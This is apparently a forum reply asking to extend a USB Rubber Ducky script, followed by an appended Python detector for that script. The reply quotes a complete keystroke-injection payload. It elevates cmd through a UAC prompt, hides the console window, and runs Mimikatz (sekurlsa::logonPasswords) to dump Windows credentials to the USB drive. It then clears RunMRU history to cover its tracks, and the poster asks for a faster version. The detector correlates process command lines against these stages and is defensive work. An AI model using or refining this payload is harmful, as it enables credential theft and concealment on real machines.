Thanks a bunch, SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information-gathering stage.
Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through PowerShell commands. For example:
DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd.exe -verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
CTRL C
REM *** Obfuscate the command prompt ***
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM *** Define Ducky Drive as DUCK ***
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Run Mimikatz from Ducky Drive ***
STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
DELAY 10000
STRING exit
ENTER
DELAY 5000
REM *** Clear duck variable, history, and GTFO ***
STRING set "duck="
ENTER
DELAY 100
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 100
STRING color 08
ENTER
DELAY 100
STRING exit
ENTER
As you can see, this is slower than simply executing several pre-made PowerShell files and requires an admin cmd to start (which may be restricted in corporate environments). I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information-gathering payload?
Thanks again.
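A defender-side check to go with the chain quoted in the post: an added example (mine, not from this thread or from the Ducky project), written in Python rather than Ducky Script, that correlates process-creation command lines (Windows Security 4688 / Sysmon event 1) against the stages of that payload on one host inside a short window, so that a single `mode con` or `wmic volume` query alone does not alert. The event tuples, host names and drive letter are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One loose, case-insensitive pattern per stage of the quoted payload (elevation, console shrinking, drive lookup, credential dump, MRU cleanup).
STAGE_PATTERNS = {
    "elevate":    re.compile(r"start-process\s+cmd(\.exe)?\s+-verb\s+runas", re.I),
    "hide":       re.compile(r"mode\s+con:?\s*cols=\d+\s+lines=\d+", re.I),
    "find_drive": re.compile(r"wmic\s+volume\s+get\s+driveletter.*findstr", re.I),
    "dump":       re.compile(r"-dumpcreds|sekurlsa::|privilege::debug", re.I),
    "cleanup":    re.compile(r"remove-itemproperty.*\\runmru", re.I),
}

def stages_in(cmdline):
    """Names of the stages whose pattern matches a single process command line."""
    return {name for name, pat in STAGE_PATTERNS.items() if pat.search(cmdline)}

def correlate(events, window=timedelta(seconds=120), min_stages=3):
    """events: (timestamp, host, command_line) tuples from 4688 / Sysmon 1 logs.
    Returns {host: sorted stages} where >= min_stages distinct stages fire within `window`."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        if hit := stages_in(cmd):
            by_host[host].append((ts, hit))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):        # window anchored at each hit
            seen = set()
            for ts, names in hits[i:]:
                if ts - start > window:
                    break
                seen |= names
            if len(seen) >= min_stages:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed sample events, not real logs: WS01 shows the whole chain within 20 s, WS02 only a harmless console resize.
T0 = datetime(2024, 1, 1, 9, 0, 0)
ev = lambda secs, host, cmd: (T0 + timedelta(seconds=secs), host, cmd)
SAMPLE_EVENTS = [
    ev(0,   "WS01", "powershell Start-Process cmd.exe -verb runAs"),
    ev(3,   "WS01", "mode con:cols=18 lines=1"),
    ev(4,   "WS01", 'wmic volume get driveletter, label | findstr "DUCKY"'),
    ev(6,   "WS01", "powershell E:\\im.ps1 -DumpCreds"),
    ev(20,  "WS01", "powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft"
                    "\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*'\""),
    ev(300, "WS02", "mode con:cols=120 lines=40"),
]
```

Running `correlate(SAMPLE_EVENTS)` flags only WS01; tightening `window` to a few seconds still catches the first three stages, which in the payload fire within about five seconds of each other.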